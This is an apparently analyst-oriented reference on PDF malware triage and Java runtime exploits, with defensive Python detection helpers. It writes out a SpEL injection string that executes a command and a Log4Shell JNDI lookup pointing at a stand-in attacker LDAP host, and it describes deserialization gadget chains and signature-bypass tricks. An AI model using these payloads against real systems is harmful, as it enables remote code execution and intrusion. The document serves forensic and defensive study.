
Document & Runtime Exploits.

PDF as a delivery vehicle (structure, script extraction, parser quirks) and the Java-runtime exploit reference — historical and current patterns, with what each reveals about the deployed JRE.

PDF — structure

File layout. Header (%PDF-1.x), body (numbered objects), xref table, trailer with the /Root object reference, then startxref and %%EOF. Use peepdf, pdfid, or pdf-parser for structural analysis.
Object types of interest.
- /JavaScript + /JS — JS payload (the obvious one).
- /EmbeddedFile — attached payload (dropper).
- /OpenAction, /AA — auto-trigger on open.
- /Launch — launch external app (mostly killed by modern viewers).
- /RichMedia — embedded Flash (historical; still in old samples).
- /SubmitForm — submit form to attacker URL.
Suspicious indicators. Mismatch between the declared object count (trailer /Size) and the objects actually present; a massive object count for a "small" PDF; streams wrapped in chained filters (for example /Filter [/ASCIIHexDecode /FlateDecode]).
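The keyword triage above can be approximated in a few lines. This is a minimal sketch, not a replacement for pdfid: the function names and the keyword list are illustrative, it scans raw bytes only (names inside compressed object streams are missed), and it undoes #xx name escapes across the whole file, which is acceptable for counting but would corrupt binary stream data if the result were reused.

```python
import re

# Name tokens taken from the list above; pdfid itself tracks a longer list.
SUSPICIOUS_NAMES = [b"/JavaScript", b"/JS", b"/EmbeddedFile", b"/OpenAction",
                    b"/AA", b"/Launch", b"/RichMedia", b"/SubmitForm"]

def decode_name_escapes(data: bytes) -> bytes:
    """Undo #xx hex escapes in names, e.g. /J#61vaScript -> /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def count_keywords(data: bytes) -> dict:
    """Count suspicious name tokens and 'N G obj' headers in raw PDF bytes."""
    data = decode_name_escapes(data)
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # Require a non-alphanumeric follower so /JS does not match /JSx.
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode()] = len(re.findall(pattern, data))
    # Object headers look like "12 0 obj"; "endobj" has no leading numbers.
    counts["obj"] = len(re.findall(rb"\b\d+\s+\d+\s+obj\b", data))
    return counts
```

A nonzero /OpenAction or /AA count together with /JS or /Launch is the combination worth a closer look; any single count on its own is weak evidence.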

PDF — script extraction

pdfid file.pdf shows counts of suspicious keywords.
pdf-parser -f file.pdf dumps objects with their stream filters applied, so compressed stream content is shown decoded.
Find object containing /JS or /JavaScript — extract content.
Reformat with js-beautify; then deobfuscate (often unescape("%u...") strings that carry shellcode).
Run extracted JS in a sandboxed JS interpreter (spidermonkey) with stubbed PDF-specific APIs to see decoded payload.
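Two of the decoding steps above need no PDF tooling at all. The sketch below assumes the stream body has already been cut out of the file and that the obfuscated string has already been isolated from the script; both function names are illustrative. It inflates a /FlateDecode stream and converts an unescape()-style string into the bytes it would occupy in memory.

```python
import re
import zlib

def inflate_stream(raw: bytes) -> bytes:
    """Decompress the body of a /FlateDecode stream (zlib-wrapped deflate)."""
    return zlib.decompress(raw)

def unescape_to_bytes(js_string: str) -> bytes:
    """Mimic JavaScript unescape() for %uXXXX and %XX, returning raw bytes.

    Every resulting character is one UTF-16 code unit, stored little-endian,
    so %u4142 becomes the byte pair 42 41 and %41 becomes 41 00.
    """
    out = bytearray()
    pos = 0
    for m in re.finditer(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", js_string):
        # Literal characters between escapes are kept as UTF-16 too.
        out += js_string[pos:m.start()].encode("utf-16-le")
        code_unit = int(m.group(1) or m.group(2), 16)
        out += code_unit.to_bytes(2, "little")
        pos = m.end()
    out += js_string[pos:].encode("utf-16-le")
    return bytes(out)
```

The resulting bytes can be handed to a disassembler or a shellcode emulator. Real samples often stack several layers (string concatenation, eval, custom decoders) before this step, so treat this as the last stage rather than a full deobfuscator.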

PDF — viewer parser disagreements

Adobe Reader vs Foxit vs browser-native. Each handles xref corruption, multiple startxref entries, and a %PDF- header that does not sit at offset 0 slightly differently. Attackers craft files that one parser rejects (the one the sandbox uses) and another accepts (the one the victim uses).
Polyglot files. Valid PDF + valid ZIP + valid JPEG simultaneously. Different consumers see different content.
Signature bypass via incremental update. The original PDF is signed; the attacker appends an incremental update that changes the rendered content; a vulnerable viewer shows the updated content while still displaying the green checkmark from the original signature.
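Several of these quirks leave cheap structural traces. The following is a rough sketch with an illustrative function name and illustrative field names; every flag it raises also occurs in benign files (ordinary incremental saves produce extra startxref and %%EOF markers), so the output is a prompt for manual review, not a verdict.

```python
def structure_anomalies(data: bytes) -> dict:
    """Collect structural oddities that different PDF parsers treat differently."""
    header_offset = data.find(b"%PDF-")   # 0 in a well-formed file, -1 if absent
    last_eof = data.rfind(b"%%EOF")
    # Non-whitespace bytes after the final %%EOF marker (5 = len(b"%%EOF")).
    trailing = data[last_eof + 5:].strip() if last_eof != -1 else b""
    return {
        "header_offset": header_offset,
        "startxref_count": data.count(b"startxref"),
        "eof_count": data.count(b"%%EOF"),      # >1 suggests appended revisions
        "trailing_bytes": len(trailing),
        "zip_local_header": b"PK\x03\x04" in data,           # possible ZIP polyglot
        "jpeg_soi_at_start": data.startswith(b"\xff\xd8\xff"),  # possible JPEG polyglot
    }
```

For a signed document, an eof_count above the number of revisions the signer produced is the cue to compare what the signature covers against the full file length.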

Java — historical exploit patterns

Applet sandbox escapes (2012–2014). CVE-2012-4681 (sun.awt.SunToolkit.getField combined with java.beans.Statement to disable the SecurityManager), CVE-2013-2423, CVE-2013-2465. Defined the era; pushed enterprises off browser-side Java.
JNLP / Web Start. Java Web Start let signed (including self-signed) apps run outside the sandbox once the user accepted the trust prompt. Multiple bypasses of that prompt followed.
Browser plugin EOL. Modern browsers don't run Java. Pattern is historical for forensics; not current.

Java — current patterns

Deserialization gadget chains (still primary). readObject on attacker bytes + classpath containing a gadget library (Commons Collections, Spring, Mozilla Rhino, Click). ysoserial generates the payload. The JEP 290 deserialization filter is rarely configured. See server-side-language-audits entry.
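Expression-language injection. SpEL, OGNL, MVEL, Velocity. ${T(Runtime).getRuntime().exec('id')} patterns. Spring Cloud Function CVE-2022-22963 is a direct SpEL injection. Spring Framework CVE-2022-22965 (Spring4Shell) is a neighbor rather than an EL bug: it abuses data binding (class.module.classLoader property paths) to reach the class loader.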
Reflection misuse. Application accepts class names + method names from user input → instantiate arbitrary class. Often combined with deserialization to find gadgets dynamically.
JNDI lookup with attacker-controlled name (Log4Shell, CVE-2021-44228). ${jndi:ldap://attacker/x} is resolved by Log4j → the LDAP response points at a remote Java class → the class is loaded and instantiated → RCE.
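When triaging captured requests or log lines for these patterns, two byte-level markers are quick to check. The sketch below uses illustrative names throughout. It recognizes the Java serialization stream header (bytes AC ED 00 05, which Base64-encode to a string starting with rO0AB) and the plain form of a JNDI lookup string. Nested lookups such as ${${lower:j}ndi:...} are deliberately out of scope, so a miss here proves nothing.

```python
import re

# STREAM_MAGIC (0xACED) followed by STREAM_VERSION (0x0005).
JAVA_SER_MAGIC = bytes.fromhex("aced0005")

# Plain, unobfuscated JNDI lookup; nested ${...} tricks will evade this.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop)\s*:",
                         re.IGNORECASE)

def looks_like_java_serialized(blob: bytes) -> bool:
    """True if blob starts with the raw or Base64-encoded serialization header."""
    if blob.startswith(JAVA_SER_MAGIC):
        return True
    # Base64 of AC ED 00 05 always begins with "rO0AB".
    return blob.lstrip().startswith(b"rO0AB")

def has_plain_jndi_lookup(text: str) -> bool:
    """True if text contains an unobfuscated ${jndi:<scheme>: lookup."""
    return JNDI_LOOKUP.search(text) is not None
```

A hit on either check identifies the delivery format only; whether it is exploitable still depends on the classpath and JDK conditions listed in this note.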

What each exploit tells you about the runtime

Exploit success against a specific gadget chain → classpath confirmed to include that library at a version below its patch (for chains built only from JRE classes, the JRE itself is below the patch).
Log4Shell trigger → log4j-core 2.0-beta9 through 2.14.1 present.
Spring4Shell trigger → Spring framework with vulnerable binding behavior + JDK ≥ 9.
JNDI fetched but no class load → JNDI lookup is enabled, but the JDK is ≥ 8u191, where remote class loading over LDAP is disabled by default. Still useful as DNS-callback proof.

Rule of thumb. Document-borne exploits are mostly social-engineering wrappers around an underlying runtime vuln. The PDF/Office/JNLP is the carrier; the actual exploit is in the embedded JS / macro / serialized payload. Triage the carrier; analyze the cargo.
